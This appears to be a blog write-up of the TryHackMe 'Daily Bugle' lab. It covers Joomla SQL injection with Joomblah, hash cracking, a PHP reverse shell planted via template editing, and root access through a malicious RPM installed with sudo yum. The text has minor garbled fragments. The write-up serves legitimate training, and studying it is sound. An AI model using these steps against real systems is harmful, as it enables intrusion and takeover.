Intro
The box Daily Bugle is part of the Offensive Pentesting path on TryHackMe and is labeled as a hard box. The theme starts off as Jonah Jameson is at it again with another story hot off the press about Spiderman doing evil deeds. As we dive deeper into the machine, we will be able to unravel the mysteries of the questions that are being asked of us and find the flags that we are after by testing out our skills in Joomla CMS SQLi, cracking hashes, and the yum vulnerability to fully compromise the box.
The Checklist
Nmap
By observing the Nmap scan it shows that there are 3 Ea ports open: SSH, MySQL (MariaDB) Server, and a Apache Server running with Joomla on CentOS. Also, there is a robots.txt file with 15 Ea disallow entries to prevent these pages from being displayed on search engine’s results.
The Robbery
By accessing the box over port 80 in the browser we see the answer to our first question on the home page. Who robbed the bank? Even though the answer is straight forward the way the answer is required to be marked as correct needs some editing for it to be checked off as completed.
Robots.txt
The robots.txt file is always a good place to look when doing recon on a website as it contains additional webpages that may not be easily found when brute forcing the directory. However, do take note that not all websites will have a robots.txt file within their directory. By going through these the second question can be answered.
Joomla CMS Access
After finding the version number and Googling for exploits, the tool Joomblah can be found on GitHub. Running Joomblah against the website a username and hash can be found. Saving the hash to a file and using John the Ripper along with the rockyou.txt wordlist the hash can be cracked, providing with the login credentials needed to access the Joomla CMS with the directory found from robots.txt directory. Now, the answer to the third question is answered.
/administrator/
Login with the newly found credentials to gain access to the Joomla CMS dashboard.
Upon logging in, navigate to 'Templates' then 'Protostar'.
Click on New File at the top and add a File Name 'shell' and Select a file type: 'PHP' then click on Create. Paste in a PHP reverse shell, make sure to edit the IP Address and the port number and click on Save. Next, start a reverse listener and navigate to 'MACHINE_IP/templates/protostar/shell.php' to gain access to the system.
Who Am I? (PrivEsc)
Upon gaining the initial shell, we see that we are the 'apache' user and have limited access. By running LinPeas we are able to locate a password that we can attempt to login as a user. Running the command 'cat /etc/passwd' we can see that there is a user named 'jjameson'.
After changing the user to 'jjameson' we are now presented with the user.txt file located in the directory '/home/jjameson/'.
I Am Root!
Running the command 'sudo -l' is a good habit to get into when in the privilege escalation stage. Sometimes a password may not be required to run the command; however, the command generally does require knowing the password of the current user that you are logged in as. After running the command we see that we can install Yum packages without a password.
To get started first you will need to create a bash file with a reverse bash script command that will connect back to your machine. Next, run the command 'fpm -n FILE-NAME -s dir -t rpm -a all --before-install PATH/TO/BASH/FILE PATH/TO/SAVE/FILE'. Afterwards start up a python server and pull the '.rpm' file over to the target machine. Once the command is running you should notice that the process hangs and that you now have a reverse shell as the user 'root'.
Finally, start your listener on your specified port to capture your reverse shell, then enter the following command on the target machine 'sudo /usr/bin/yum --disablerepo-* install -y FILE-NAME.rpm'. By navigating to the '/root/' directory you will locate your root.txt file and now you have completed the room!
Comentários